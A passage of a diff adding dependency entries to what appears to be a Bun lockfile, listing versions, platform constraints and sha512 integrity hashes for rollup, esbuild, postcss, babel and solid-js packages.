+    "@rollup/rollup-linux-x64-gnu": ["@rollup/rollup-linux-x64-gnu@4.56.0", "", { "os": "linux", "cpu": "x64" }, "sha512-MVC6UDp16ZSH7x4rtuJPAEoE1RwS8N4oK9DLHy3FTEdFoUTCFVzMfJl/BVJ330C+hx8FfprA5Wqx4FhZXkj2Kw=="],
+
+    "@rollup/rollup-linux-x64-musl": ["@rollup/rollup-linux-x64-musl@4.56.0", "", { "os": "linux", "cpu": "x64" }, "sha512-ZhGH1eA4Qv0lxaV00azCIS1ChedK0V32952Md3FtnxSqZTBTd6tgil4nZT5cU8B+SIw3PFYkvyR4FKo2oyZIHA=="],
+
+    "@rollup/rollup-openbsd-x64": ["@rollup/rollup-openbsd-x64@4.56.0", "", { "os": "openbsd", "cpu": "x64" }, "sha512-O16XcmyDeFI9879pEcmtWvD/2nyxR9mF7Gs44lf1vGGx8Vg2DRNx11aVXBEqOQhWb92WN4z7fW/q4+2NYzCbBA=="],
+
+    "@rollup/rollup-openharmony-arm64": ["@rollup/rollup-openharmony-arm64@4.56.0", "", { "os": "none", "cpu": "arm64" }, "sha512-LhN/Reh+7F3RCgQIRbgw8ZMwUwyqJM+8pXNT6IIJAqm2IdKkzpCh/V9EdgOMBKuebIrzswqy4ATlrDgiOwbRcQ=="],
+
+    "@rollup/rollup-win32-arm64-msvc": ["@rollup/rollup-win32-arm64-msvc@4.56.0", "", { "os": "win32", "cpu": "arm64" }, "sha512-kbFsOObXp3LBULg1d3JIUQMa9Kv4UitDmpS+k0tinPBz3watcUiV2/LUDMMucA6pZO3WGE27P7DsfaN54l9ing=="],
+
+    "@rollup/rollup-win32-ia32-msvc": ["@rollup/rollup-win32-ia32-msvc@4.56.0", "", { "os": "win32", "cpu": "ia32" }, "sha512-vSSgny54D6P4vf2izbtFm/TcWYedw7f8eBrOiGGecyHyQB9q4Kqentjaj8hToe+995nob/Wv48pDqL5a62EWtg=="],
+
+    "@rollup/rollup-win32-x64-gnu": ["@rollup/rollup-win32-x64-gnu@4.56.0", "", { "os": "win32", "cpu": "x64" }, "sha512-FeCnkPCTHQJFbiGG49KjV5YGW/8b9rrXAM2Mz2kiIoktq2qsJxRD5giEMEOD2lPdgs72upzefaUvS+nc8E3UzQ=="],
+
+    "@rollup/rollup-win32-x64-msvc": ["@rollup/rollup-win32-x64-msvc@4.56.0", "", { "os": "win32", "cpu": "x64" }, "sha512-H8AE9Ur/t0+1VXujj90w0HrSOuv0Nq9r1vSZF2t5km20NTfosQsGGUXDaKdQZzwuLts7IyL1fYT4hM95TI9c4g=="],
+
+    "@solidjs/router": ["@solidjs/router@0.15.4", "", { "peerDependencies": { "solid-js": "^1.8.6" } }, "sha512-WOpgg9a9T638cR+5FGbFi/IV4l2FpmBs1GpIMSPa0Ce9vyJN7Wts+X2PqMf9IYn0zUj2MlSJtm1gp7/HI/n5TQ=="],
+
+    "@types/babel__core": ["@types/babel__core@7.20.5", "", { "dependencies": { "@babel/parser": "^7.20.7", "@babel/types": "^7.20.7", "@types/babel__generator": "*", "@types/babel__template": "*", "@types/babel__traverse": "*" } }, "sha512-qoQprZvz5wQFJwMDqeseRXWv3rqMvhgpbXFfVyWhbx9X47POIA6i/+dXefEmZKoAgOaTdaIgNSMqMIU61yRyzA=="],
+
+    "@types/babel__generator": ["@types/babel__generator@7.27.0", "", { "dependencies": { "@babel/types": "^7.0.0" } }, "sha512-ufFd2Xi92OAVPYsy+P4n7/U7e68fex0+Ee8gSG9KX7eo084CWiQ4sdxktvdl0bOPupXtVJPY19zk6EwWqUQ8lg=="],
+
+    "@types/babel__template": ["@types/babel__template@7.4.4", "", { "dependencies": { "@babel/parser": "^7.1.0", "@babel/types": "^7.0.0" } }, "sha512-h/NUaSyG5EyxBIp8YRxo4RMe2/qQgvyowRwVMzhYhBCONbW8PUsg4lkFMrhgZhUe5z3L3MiLDuvyJ/CaPa2A8A=="],
+
+    "@types/babel__traverse": ["@types/babel__traverse@7.28.0", "", { "dependencies": { "@babel/types": "^7.28.2" } }, "sha512-8PvcXf70gTDZBgt9ptxJ8elBeBjcLOAcOtoO/mPJjtji1+CdGbHgm77om1GrsPxsiE+uXIpNSK64UYaIwQXd4Q=="],
+
+    "@types/estree": ["@types/estree@1.0.8", "", {}, "sha512-dWHzHa2WqEXI/O1E9OjrocMTKJl2mSrEolh1Iomrv6U+JuNwaHXsXx9bLu5gG7BUWFIN0skIQJQ/L1rIex4X6w=="],
+
+    "@types/node": ["@types/node@22.19.7", "", { "dependencies": { "undici-types": "~6.21.0" } }, "sha512-MciR4AKGHWl7xwxkBa6xUGxQJ4VBOmPTF7sL+iGzuahOFaO0jHCsuEfS80pan1ef4gWId1oWOweIhrDEYLuaOw=="],
+
+    "any-promise": ["any-promise@1.3.0", "", {}, "sha512-7UvmKalWRt1wgjL1RrGxoSJW/0QZFIegpeGvZG9kjp8vrRu55XTHbwnqq2GpXm9uLbcuhxm3IqX9OB4MZR1b2A=="],
+
+    "anymatch": ["anymatch@3.1.3", "", { "dependencies": { "normalize-path": "^3.0.0", "picomatch": "^2.0.4" } }, "sha512-KMReFUr0B4t+D+OBkjR3KYqvocp2XaSzO55UcB6mgQMd3KbcE+mWTyvVV7D/zsdEbNnV6acZUutkiHQXvTr1Rw=="],
+
+    "arg": ["arg@5.0.2", "", {}, "sha512-PYjyFOLKQ9y57JvQ6QLo8dAgNqswh8M1RMJYdQduT6xbWSgK36P/Z/v+p888pM69jMMfS8Xd8F6I1kQ/I9HUGg=="],
+
+    "autoprefixer": ["autoprefixer@10.4.23", "", { "dependencies": { "browserslist": "^4.28.1", "caniuse-lite": "^1.0.30001760", "fraction.js": "^5.3.4", "picocolors": "^1.1.1", "postcss-value-parser": "^4.2.0" }, "peerDependencies": { "postcss": "^8.1.0" }, "bin": { "autoprefixer": "bin/autoprefixer" } }, "sha512-YYTXSFulfwytnjAPlw8QHncHJmlvFKtczb8InXaAx9Q0LbfDnfEYDE55omerIJKihhmU61Ft+cAOSzQVaBUmeA=="],
+
+    "babel-plugin-jsx-dom-expressions": ["babel-plugin-jsx-dom-expressions@0.40.3", "", { "dependencies": { "@babel/helper-module-imports": "7.18.6", "@babel/plugin-syntax-jsx": "^7.18.6", "@babel/types": "^7.20.7", "html-entities": "2.3.3", "parse5": "^7.1.2" }, "peerDependencies": { "@babel/core": "^7.20.12" } }, "sha512-5HOwwt0BYiv/zxl7j8Pf2bGL6rDXfV6nUhLs8ygBX+EFJXzBPHM/euj9j/6deMZ6wa52Wb2PBaAV5U/jKwIY1w=="],
+
+    "babel-preset-solid": ["babel-preset-solid@1.9.10", "", { "dependencies": { "babel-plugin-jsx-dom-expressions": "^0.40.3" }, "peerDependencies": { "@babel/core": "^7.0.0", "solid-js": "^1.9.10" }, "optionalPeers": ["solid-js"] }, "sha512-HCelrgua/Y+kqO8RyL04JBWS/cVdrtUv/h45GntgQY+cJl4eBcKkCDV3TdMjtKx1nXwRaR9QXslM/Npm1dxdZQ=="],
+
+    "baseline-browser-mapping": ["baseline-browser-mapping@2.9.17", "", { "bin": { "baseline-browser-mapping": "dist/cli.js" } }, "sha512-agD0MgJFUP/4nvjqzIB29zRPUuCF7Ge6mEv9s8dHrtYD7QWXRcx75rOADE/d5ah1NI+0vkDl0yorDd5U852IQQ=="],
+
+    "binary-extensions": ["binary-extensions@2.3.0", "", {}, "sha512-Ceh+7ox5qe7LJuLHoY0feh3pHuUDHAcRUeyL2VYghZwfpkNIy/+8Ocg0a3UuSoYzavmylwuLWQOf3hl0jjMMIw=="],
+
+    "braces": ["braces@3.0.3", "", { "dependencies": { "fill-range": "^7.1.1" } }, "sha512-yQbXgO/OSZVD2IsiLlro+7Hf6Q18EJrKSEsdoMzKePKXct3gvD8oLcOQdIzGupr5Fj+EDe8gO/lxc1BzfMpxvA=="],
+
+    "browserslist": ["browserslist@4.28.1", "", { "dependencies": { "baseline-browser-mapping": "^2.9.0", "caniuse-lite": "^1.0.30001759", "electron-to-chromium": "^1.5.263", "node-releases": "^2.0.27", "update-browserslist-db": "^1.2.0" }, "bin": { "browserslist": "cli.js" } }, "sha512-ZC5Bd0LgJXgwGqUknZY/vkUQ04r8NXnJZ3yYi4vDmSiZmC/pdSN0NbNRPxZpbtO4uAfDUAFffO8IZoM3Gj8IkA=="],
+
+    "camelcase-css": ["camelcase-css@2.0.1", "", {}, "sha512-QOSvevhslijgYwRx6Rv7zKdMF8lbRmx+uQGx2+vDc+KI/eBnsy9kit5aj23AgGu3pa4t9AgwbnXWqS+iOY+2aA=="],
+
+    "caniuse-lite": ["caniuse-lite@1.0.30001765", "", {}, "sha512-LWcNtSyZrakjECqmpP4qdg0MMGdN368D7X8XvvAqOcqMv0RxnlqVKZl2V6/mBR68oYMxOZPLw/gO7DuisMHUvQ=="],
+
+    "chokidar": ["chokidar@3.6.0", "", { "dependencies": { "anymatch": "~3.1.2", "braces": "~3.0.2", "glob-parent": "~5.1.2", "is-binary-path": "~2.1.0", "is-glob": "~4.0.1", "normalize-path": "~3.0.0", "readdirp": "~3.6.0" }, "optionalDependencies": { "fsevents": "~2.3.2" } }, "sha512-7VT13fmjotKpGipCW9JEQAusEPE+Ei8nl6/g4FBAmIm0GOOLMua9NDDo/DWp0ZAxCr3cPq5ZpBqmPAQgDda2Pw=="],
+
+    "commander": ["commander@4.1.1", "", {}, "sha512-NOKm8xhkzAjzFx8B2v5OAHT+u5pRQc2UCa2Vq9jYL/31o2wi9mxBA7LIFs3sV5VSC49z6pEhfbMULvShKj26WA=="],
+
+    "convert-source-map": ["convert-source-map@2.0.0", "", {}, "sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg=="],
+
+    "cssesc": ["cssesc@3.0.0", "", { "bin": { "cssesc": "bin/cssesc" } }, "sha512-/Tb/JcjK111nNScGob5MNtsntNM1aCNUDipB/TkwZFhyDrrE47SOx/18wF2bbjgc3ZzCSKW1T5nt5EbFoAz/Vg=="],
+
+    "csstype": ["csstype@3.2.3", "", {}, "sha512-z1HGKcYy2xA8AGQfwrn0PAy+PB7X/GSj3UVJW9qKyn43xWa+gl5nXmU4qqLMRzWVLFC8KusUX8T/0kCiOYpAIQ=="],
+
+    "debug": ["debug@4.4.3", "", { "dependencies": { "ms": "^2.1.3" } }, "sha512-RGwwWnwQvkVfavKVt22FGLw+xYSdzARwm0ru6DhTVA3umU5hZc28V3kO4stgYryrTlLpuvgI9GiijltAjNbcqA=="],
+
+    "didyoumean": ["didyoumean@1.2.2", "", {}, "sha512-gxtyfqMg7GKyhQmb056K7M3xszy/myH8w+B4RT+QXBQsvAOdc3XymqDDPHx1BgPgsdAA5SIifona89YtRATDzw=="],
+
+    "dlv": ["dlv@1.1.3", "", {}, "sha512-+HlytyjlPKnIG8XuRG8WvmBP8xs8P71y+SKKS6ZXWoEgLuePxtDoUEiH7WkdePWrQ5JBpE6aoVqfZfJUQkjXwA=="],
+
+    "electron-to-chromium": ["electron-to-chromium@1.5.277", "", {}, "sha512-wKXFZw4erWmmOz5N/grBoJ2XrNJGDFMu2+W5ACHza5rHtvsqrK4gb6rnLC7XxKB9WlJ+RmyQatuEXmtm86xbnw=="],
+
+    "entities": ["entities@6.0.1", "", {}, "sha512-aN97NXWF6AWBTahfVOIrB/NShkzi5H7F9r1s9mD3cDj4Ko5f2qhhVoYMibXF7GlLveb/D2ioWay8lxI97Ven3g=="],
+
+    "esbuild": ["esbuild@0.25.12", "", { "optionalDependencies": { "@esbuild/aix-ppc64": "0.25.12", "@esbuild/android-arm": "0.25.12", "@esbuild/android-arm64": "0.25.12", "@esbuild/android-x64": "0.25.12", "@esbuild/darwin-arm64": "0.25.12", "@esbuild/darwin-x64": "0.25.12", "@esbuild/freebsd-arm64": "0.25.12", "@esbuild/freebsd-x64": "0.25.12", "@esbuild/linux-arm": "0.25.12", "@esbuild/linux-arm64": "0.25.12", "@esbuild/linux-ia32": "0.25.12", "@esbuild/linux-loong64": "0.25.12", "@esbuild/linux-mips64el": "0.25.12", "@esbuild/linux-ppc64": "0.25.12", "@esbuild/linux-riscv64": "0.25.12", "@esbuild/linux-s390x": "0.25.12", "@esbuild/linux-x64": "0.25.12", "@esbuild/netbsd-arm64": "0.25.12", "@esbuild/netbsd-x64": "0.25.12", "@esbuild/openbsd-arm64": "0.25.12", "@esbuild/openbsd-x64": "0.25.12", "@esbuild/openharmony-arm64": "0.25.12", "@esbuild/sunos-x64": "0.25.12", "@esbuild/win32-arm64": "0.25.12", "@esbuild/win32-ia32": "0.25.12", "@esbuild/win32-x64": "0.25.12" }, "bin": { "esbuild": "bin/esbuild" } }, "sha512-bbPBYYrtZbkt6Os6FiTLCTFxvq4tt3JKall1vRwshA3fdVztsLAatFaZobhkBC8/BrPetoa0oksYoKXoG4ryJg=="],
+
+    "escalade": ["escalade@3.2.0", "", {}, "sha512-WUj2qlxaQtO4g6Pq5c29GTcWGDyd8itL8zTlipgECz3JesAiiOKotd8JU6otB3PACgG6xkJUyVhboMS+bje/jA=="],
+
+    "fast-glob": ["fast-glob@3.3.3", "", { "dependencies": { "@nodelib/fs.stat": "^2.0.2", "@nodelib/fs.walk": "^1.2.3", "glob-parent": "^5.1.2", "merge2": "^1.3.0", "micromatch": "^4.0.8" } }, "sha512-7MptL8U0cqcFdzIzwOTHoilX9x5BrNqye7Z/LuC7kCMRio1EMSyqRK3BEAUD7sXRq4iT4AzTVuZdhgQ2TCvYLg=="],
+
+    "fastq": ["fastq@1.20.1", "", { "dependencies": { "reusify": "^1.0.4" } }, "sha512-GGToxJ/w1x32s/D2EKND7kTil4n8OVk/9mycTc4VDza13lOvpUZTGX3mFSCtV9ksdGBVzvsyAVLM6mHFThxXxw=="],
+
+    "fdir": ["fdir@6.5.0", "", { "peerDependencies": { "picomatch": "^3 || ^4" }, "optionalPeers": ["picomatch"] }, "sha512-tIbYtZbucOs0BRGqPJkshJUYdL+SDH7dVM8gjy+ERp3WAUjLEFJE+02kanyHtwjWOnwrKYBiwAmM0p4kLJAnXg=="],
+
+    "fill-range": ["fill-range@7.1.1", "", { "dependencies": { "to-regex-range": "^5.0.1" } }, "sha512-YsGpe3WHLK8ZYi4tWDg2Jy3ebRz2rXowDxnld4bkQB00cc/1Zw9AWnC0i9ztDJitivtQvaI9KaLyKrc+hBW0yg=="],
+
+    "fraction.js": ["fraction.js@5.3.4", "", {}, "sha512-1X1NTtiJphryn/uLQz3whtY6jK3fTqoE3ohKs0tT+Ujr1W59oopxmoEh7Lu5p6vBaPbgoM0bzveAW4Qi5RyWDQ=="],
+
+    "fsevents": ["fsevents@2.3.3", "", { "os": "darwin" }, "sha512-5xoDfX+fL7faATnagmWPpbFtwh/R77WmMMqqHGS65C3vvB0YHrgF+B1YmZ3441tMj5n63k0212XNoJwzlhffQw=="],
+
+    "function-bind": ["function-bind@1.1.2", "", {}, "sha512-7XHNxH7qX9xG5mIwxkhumTox/MIRNcOgDrxWsMt2pAr23WHp6MrRlN7FBSFpCpr+oVO0F744iUgR82nJMfG2SA=="],
+
+    "gensync": ["gensync@1.0.0-beta.2", "", {}, "sha512-3hN7NaskYvMDLQY55gnW3NQ+mesEAepTqlg+VEbj7zzqEMBVNhzcGYYeqFo/TlYz6eQiFcp1HcsCZO+nGgS8zg=="],
+
+    "glob-parent": ["glob-parent@6.0.2", "", { "dependencies": { "is-glob": "^4.0.3" } }, "sha512-XxwI8EOhVQgWp6iDL+3b0r86f4d6AX6zSU55HfB4ydCEuXLXc5FcYeOu+nnGftS4TEju/11rt4KJPTMgbfmv4A=="],
+
+    "hasown": ["hasown@2.0.2", "", { "dependencies": { "function-bind": "^1.1.2" } }, "sha512-0hJU9SCPvmMzIBdZFqNPXWa6dqh7WdH0cII9y+CyS8rG3nL48Bclra9HmKhVVUHyPWNH5Y7xDwAB7bfgSjkUMQ=="],
+
+    "html-entities": ["html-entities@2.3.3", "", {}, "sha512-DV5Ln36z34NNTDgnz0EWGBLZENelNAtkiFA4kyNOG2tDI6Mz1uSWiq1wAKdyjnJwyDiDO7Fa2SO1CTxPXL8VxA=="],
+
+    "is-binary-path": ["is-binary-path@2.1.0", "", { "dependencies": { "binary-extensions": "^2.0.0" } }, "sha512-ZMERYes6pDydyuGidse7OsHxtbI7WVeUEozgR/g7rd0xUimYNlvZRE/K2MgZTjWy725IfelLeVcEM97mmtRGXw=="],
+
+    "is-core-module": ["is-core-module@2.16.1", "", { "dependencies": { "hasown": "^2.0.2" } }, "sha512-UfoeMA6fIJ8wTYFEUjelnaGI67v6+N7qXJEvQuIGa99l4xsCruSYOVSQ0uPANn4dAzm8lkYPaKLrrijLq7x23w=="],
+
+    "is-extglob": ["is-extglob@2.1.1", "", {}, "sha512-SbKbANkN603Vi4jEZv49LeVJMn4yGwsbzZworEoyEiutsN3nJYdbO36zfhGJ6QEDpOZIFkDtnq5JRxmvl3jsoQ=="],
+
+    "is-glob": ["is-glob@4.0.3", "", { "dependencies": { "is-extglob": "^2.1.1" } }, "sha512-xelSayHH36ZgE7ZWhli7pW34hNbNl8Ojv5KVmkJD4hBdD3th8Tfk9vYasLM+mXWOZhFkgZfxhLSnrwRr4elSSg=="],
+
+    "is-number": ["is-number@7.0.0", "", {}, "sha512-41Cifkg6e8TylSpdtTpeLVMqvSBEVzTttHvERD741+pnZ8ANv0004MRL43QKPDlK9cGvNp6NZWZUBlbGXYxxng=="],
+
+    "is-what": ["is-what@4.1.16", "", {}, "sha512-ZhMwEosbFJkA0YhFnNDgTM4ZxDRsS6HqTo7qsZM08fehyRYIYa0yHu5R6mgo1n/8MgaPBXiPimPD77baVFYg+A=="],
+
+    "jiti": ["jiti@1.21.7", "", { "bin": { "jiti": "bin/jiti.js" } }, "sha512-/imKNG4EbWNrVjoNC/1H5/9GFy+tqjGBHCaSsN+P2RnPqjsLmv6UD3Ej+Kj8nBWaRAwyk7kK5ZUc+OEatnTR3A=="],
+
+    "js-tokens": ["js-tokens@4.0.0", "", {}, "sha512-RdJUflcE3cUzKiMqQgsCu06FPu9UdIJO0beYbPhHN4k6apgJtifcoCtT9bcxOpYBtpD2kCM6Sbzg4CausW/PKQ=="],
+
+    "jsesc": ["jsesc@3.1.0", "", { "bin": { "jsesc": "bin/jsesc" } }, "sha512-/sM3dO2FOzXjKQhJuo0Q173wf2KOo8t4I8vHy6lF9poUp7bKT0/NHE8fPX23PwfhnykfqnC2xRxOnVw5XuGIaA=="],
+
+    "json5": ["json5@2.2.3", "", { "bin": { "json5": "lib/cli.js" } }, "sha512-XmOWe7eyHYH14cLdVPoyg+GOH3rYX++KpzrylJwSW98t3Nk+U8XOl8FWKOgwtzdb8lXGf6zYwDUzeHMWfxasyg=="],
+
+    "lilconfig": ["lilconfig@3.1.3", "", {}, "sha512-/vlFKAoH5Cgt3Ie+JLhRbwOsCQePABiU3tJ1egGvyQ+33R/vcwM2Zl2QR/LzjsBeItPt3oSVXapn+m4nQDvpzw=="],
+
+    "lines-and-columns": ["lines-and-columns@1.2.4", "", {}, "sha512-7ylylesZQ/PV29jhEDl3Ufjo6ZX7gCqJr5F7PKrqc93v7fzSymt1BpwEU8nAUXs8qzzvqhbjhK5QZg6Mt/HkBg=="],
+
+    "lru-cache": ["lru-cache@5.1.1", "", { "dependencies": { "yallist": "^3.0.2" } }, "sha512-KpNARQA3Iwv+jTA0utUVVbrh+Jlrr1Fv0e56GGzAFOXN7dk/FviaDW8LHmK52DlcH4WP2n6gI8vN1aesBFgo9w=="],
+
+    "merge-anything": ["merge-anything@5.1.7", "", { "dependencies": { "is-what": "^4.1.8" } }, "sha512-eRtbOb1N5iyH0tkQDAoQ4Ipsp/5qSR79Dzrz8hEPxRX10RWWR/iQXdoKmBSRCThY1Fh5EhISDtpSc93fpxUniQ=="],
+
+    "merge2": ["merge2@1.4.1", "", {}, "sha512-8q7VEgMJW4J8tcfVPy8g09NcQwZdbwFEqhe/WZkoIzjn/3TGDwtOCYtXGxA3O8tPzpczCCDgv+P2P5y00ZJOOg=="],
+
+    "micromatch": ["micromatch@4.0.8", "", { "dependencies": { "braces": "^3.0.3", "picomatch": "^2.3.1" } }, "sha512-PXwfBhYu0hBCPw8Dn0E+WDYb7af3dSLVWKi3HGv84IdF4TyFoC0ysxFd0Goxw7nSv4T/PzEJQxsYsEiFCKo2BA=="],
+
+    "ms": ["ms@2.1.3", "", {}, "sha512-6FlzubTLZG3J2a/NVCAleEhjzq5oxgHyaCU9yYXvcLsvoVaHJq/s5xXI6/XXP6tz7R9xAOtHnSO/tXtF3WRTlA=="],
+
+    "mz": ["mz@2.7.0", "", { "dependencies": { "any-promise": "^1.0.0", "object-assign": "^4.0.1", "thenify-all": "^1.0.0" } }, "sha512-z81GNO7nnYMEhrGh9LeymoE4+Yr0Wn5McHIZMK5cfQCl+NDX08sCZgUc9/6MHni9IWuFLm1Z3HTCXu2z9fN62Q=="],
+
+    "nanoid": ["nanoid@3.3.11", "", { "bin": { "nanoid": "bin/nanoid.cjs" } }, "sha512-N8SpfPUnUp1bK+PMYW8qSWdl9U+wwNWI4QKxOYDy9JAro3WMX7p2OeVRF9v+347pnakNevPmiHhNmZ2HbFA76w=="],
+
+    "node-releases": ["node-releases@2.0.27", "", {}, "sha512-nmh3lCkYZ3grZvqcCH+fjmQ7X+H0OeZgP40OierEaAptX4XofMh5kwNbWh7lBduUzCcV/8kZ+NDLCwm2iorIlA=="],
+
+    "normalize-path": ["normalize-path@3.0.0", "", {}, "sha512-6eZs5Ls3WtCisHWp9S2GUy8dqkpGi4BVSz3GaqiE6ezub0512ESztXUwUB6C6IKbQkY2Pnb/mD4WYojCRwcwLA=="],
+
+    "object-assign": ["object-assign@4.1.1", "", {}, "sha512-rJgTQnkUnH1sFw8yT6VSU3zD3sWmu6sZhIseY8VX+GRu3P6F7Fu+JNDoXfklElbLJSnc3FUQHVe4cU5hj+BcUg=="],
+
+    "object-hash": ["object-hash@3.0.0", "", {}, "sha512-RSn9F68PjH9HqtltsSnqYC1XXoWe9Bju5+213R98cNGttag9q9yAOTzdbsqvIa7aNm5WffBZFpWYr2aWrklWAw=="],
+
+    "parse5": ["parse5@7.3.0", "", { "dependencies": { "entities": "^6.0.0" } }, "sha512-IInvU7fabl34qmi9gY8XOVxhYyMyuH2xUNpb2q8/Y+7552KlejkRvqvD19nMoUW/uQGGbqNpA6Tufu5FL5BZgw=="],
+
+    "path-parse": ["path-parse@1.0.7", "", {}, "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw=="],
+
+    "picocolors": ["picocolors@1.1.1", "", {}, "sha512-xceH2snhtb5M9liqDsmEw56le376mTZkEX/jEb/RxNFyegNul7eNslCXP9FDj/Lcu0X8KEyMceP2ntpaHrDEVA=="],
+
+    "picomatch": ["picomatch@4.0.3", "", {}, "sha512-5gTmgEY/sqK6gFXLIsQNH19lWb4ebPDLA4SdLP7dsWkIXHWlG66oPuVvXSGFPppYZz8ZDZq0dYYrbHfBCVUb1Q=="],
+
+    "pify": ["pify@2.3.0", "", {}, "sha512-udgsAY+fTnvv7kI7aaxbqwWNb0AHiB0qBO89PZKPkoTmGOgdbrHDKD+0B2X4uTfJ/FT1R09r9gTsjUjNJotuog=="],
+
+    "pirates": ["pirates@4.0.7", "", {}, "sha512-TfySrs/5nm8fQJDcBDuUng3VOUKsd7S+zqvbOTiGXHfxX4wK31ard+hoNuvkicM/2YFzlpDgABOevKSsB4G/FA=="],
+
+    "postcss": ["postcss@8.5.6", "", { "dependencies": { "nanoid": "^3.3.11", "picocolors": "^1.1.1", "source-map-js": "^1.2.1" } }, "sha512-3Ybi1tAuwAP9s0r1UQ2J4n5Y0G05bJkpUIO0/bI9MhwmD70S5aTWbXGBwxHrelT+XM1k6dM0pk+SwNkpTRN7Pg=="],
+
+    "postcss-import": ["postcss-import@15.1.0", "", { "dependencies": { "postcss-value-parser": "^4.0.0", "read-cache": "^1.0.0", "resolve": "^1.1.7" }, "peerDependencies": { "postcss": "^8.0.0" } }, "sha512-hpr+J05B2FVYUAXHeK1YyI267J/dDDhMU6B6civm8hSY1jYJnBXxzKDKDswzJmtLHryrjhnDjqqp/49t8FALew=="],
+
+    "postcss-js": ["postcss-js@4.1.0", "", { "dependencies": { "camelcase-css": "^2.0.1" }, "peerDependencies": { "postcss": "^8.4.21" } }, "sha512-oIAOTqgIo7q2EOwbhb8UalYePMvYoIeRY2YKntdpFQXNosSu3vLrniGgmH9OKs/qAkfoj5oB3le/7mINW1LCfw=="],
+
+    "postcss-load-config": ["postcss-load-config@6.0.1", "", { "dependencies": { "lilconfig": "^3.1.1" }, "peerDependencies": { "jiti": ">=1.21.0", "postcss": ">=8.0.9", "tsx": "^4.8.1", "yaml": "^2.4.2" }, "optionalPeers": ["jiti", "postcss", "tsx", "yaml"] }, "sha512-oPtTM4oerL+UXmx+93ytZVN82RrlY/wPUV8IeDxFrzIjXOLF1pN+EmKPLbubvKHT2HC20xXsCAH2Z+CKV6Oz/g=="],
+
+    "postcss-nested": ["postcss-nested@6.2.0", "", { "dependencies": { "postcss-selector-parser": "^6.1.1" }, "peerDependencies": { "postcss": "^8.2.14" } }, "sha512-HQbt28KulC5AJzG+cZtj9kvKB93CFCdLvog1WFLf1D+xmMvPGlBstkpTEZfK5+AN9hfJocyBFCNiqyS48bpgzQ=="],
+
+    "postcss-selector-parser": ["postcss-selector-parser@6.1.2", "", { "dependencies": { "cssesc": "^3.0.0", "util-deprecate": "^1.0.2" } }, "sha512-Q8qQfPiZ+THO/3ZrOrO0cJJKfpYCagtMUkXbnEfmgUjwXg6z/WBeOyS9APBBPCTSiDV+s4SwQGu8yFsiMRIudg=="],
+
+    "postcss-value-parser": ["postcss-value-parser@4.2.0", "", {}, "sha512-1NNCs6uurfkVbeXG4S8JFT9t19m45ICnif8zWLd5oPSZ50QnwMfK+H3jv408d4jw/7Bttv5axS5IiHoLaVNHeQ=="],
+
+    "queue-microtask": ["queue-microtask@1.2.3", "", {}, "sha512-NuaNSa6flKT5JaSYQzJok04JzTL1CA6aGhv5rfLW3PgqA+M2ChpZQnAC8h8i4ZFkBS8X5RqkDBHA7r4hej3K9A=="],
+
+    "read-cache": ["read-cache@1.0.0", "", { "dependencies": { "pify": "^2.3.0" } }, "sha512-Owdv/Ft7IjOgm/i0xvNDZ1LrRANRfew4b2prF3OWMQLxLfu3bS8FVhCsrSCMK4lR56Y9ya+AThoTpDCTxCmpRA=="],
+
+    "readdirp": ["readdirp@3.6.0", "", { "dependencies": { "picomatch": "^2.2.1" } }, "sha512-hOS089on8RduqdbhvQ5Z37A0ESjsqz6qnRcffsMU3495FuTdqSm+7bhJ29JvIOsBDEEnan5DPu9t3To9VRlMzA=="],
+
+    "resolve": ["resolve@1.22.11", "", { "dependencies": { "is-core-module": "^2.16.1", "path-parse": "^1.0.7", "supports-preserve-symlinks-flag": "^1.0.0" }, "bin": { "resolve": "bin/resolve" } }, "sha512-RfqAvLnMl313r7c9oclB1HhUEAezcpLjz95wFH4LVuhk9JF/r22qmVP9AMmOU4vMX7Q8pN8jwNg/CSpdFnMjTQ=="],
+
+    "reusify": ["reusify@1.1.0", "", {}, "sha512-g6QUff04oZpHs0eG5p83rFLhHeV00ug/Yf9nZM6fLeUrPguBTkTQOdpAWWspMh55TZfVQDPaN3NQJfbVRAxdIw=="],
+
+    "rollup": ["rollup@4.56.0", "", { "dependencies": { "@types/estree": "1.0.8" }, "optionalDependencies": { "@rollup/rollup-android-arm-eabi": "4.56.0", "@rollup/rollup-android-arm64": "4.56.0", "@rollup/rollup-darwin-arm64": "4.56.0", "@rollup/rollup-darwin-x64": "4.56.0", "@rollup/rollup-freebsd-arm64": "4.56.0", "@rollup/rollup-freebsd-x64": "4.56.0", "@rollup/rollup-linux-arm-gnueabihf": "4.56.0", "@rollup/rollup-linux-arm-musleabihf": "4.56.0", "@rollup/rollup-linux-arm64-gnu": "4.56.0", "@rollup/rollup-linux-arm64-musl": "4.56.0", "@rollup/rollup-linux-loong64-gnu": "4.56.0", "@rollup/rollup-linux-loong64-musl": "4.56.0", "@rollup/rollup-linux-ppc64-gnu": "4.56.0", "@rollup/rollup-linux-ppc64-musl": "4.56.0", "@rollup/rollup-linux-riscv64-gnu": "4.56.0", "@rollup/rollup-linux-riscv64-musl": "4.56.0", "@rollup/rollup-linux-s390x-gnu": "4.56.0", "@rollup/rollup-linux-x64-gnu": "4.56.0", "@rollup/rollup-linux-x64-musl": "4.56.0", "@rollup/rollup-openbsd-x64": "4.56.0", "@rollup/rollup-openharmony-arm64": "4.56.0", "@rollup/rollup-win32-arm64-msvc": "4.56.0", "@rollup/rollup-win32-ia32-msvc": "4.56.0", "@rollup/rollup-win32-x64-gnu": "4.56.0", "@rollup/rollup-win32-x64-msvc": "4.56.0", "fsevents": "~2.3.2" }, "bin": { "rollup": "dist/bin/rollup" } }, "sha512-9FwVqlgUHzbXtDg9RCMgodF3Ua4Na6Gau+Sdt9vyCN4RhHfVKX2DCHy3BjMLTDd47ITDhYAnTwGulWTblJSDLg=="],
+
+    "run-parallel": ["run-parallel@1.2.0", "", { "dependencies": { "queue-microtask": "^1.2.2" } }, "sha512-5l4VyZR86LZ/lDxZTR6jqL8AFE2S0IFLMP26AbjsLVADxHdhB/c0GUsH+y39UfCi3dzz8OlQuPmnaJOMoDHQBA=="],
+
+    "semver": ["semver@6.3.1", "", { "bin": { "semver": "bin/semver.js" } }, "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA=="],
+
